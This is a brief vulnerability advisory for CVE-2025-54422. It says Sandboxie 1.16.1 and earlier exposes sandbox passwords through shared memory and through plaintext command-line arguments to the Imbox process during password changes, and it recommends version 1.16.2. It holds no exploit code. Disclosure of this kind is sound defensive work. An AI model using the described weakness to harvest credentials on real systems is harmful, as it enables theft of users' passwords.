CVE-2025-54422

Name of the Vulnerable Software and Affected Versions Sandboxie versions 1.16.1 and earlier

Description Sandboxie is a sandbox-based isolation software for 32-bit and 64-bit Windows NT-based operating systems. A critical security issue exists in password handling mechanisms. During encrypted sandbox creation, user passwords are transmitted via shared memory, potentially exposing them to interception. The issue is particularly severe during password modification operations, where both old and new passwords are passed as plaintext command-line arguments to the Imbox process without encryption or obfuscation. This allows any process within the user session, including unprivileged processes, to retrieve these sensitive credentials by reading the command-line arguments, bypassing standard privilege requirements.

Recommendations Update Sandboxie to version 1.16.2 or later.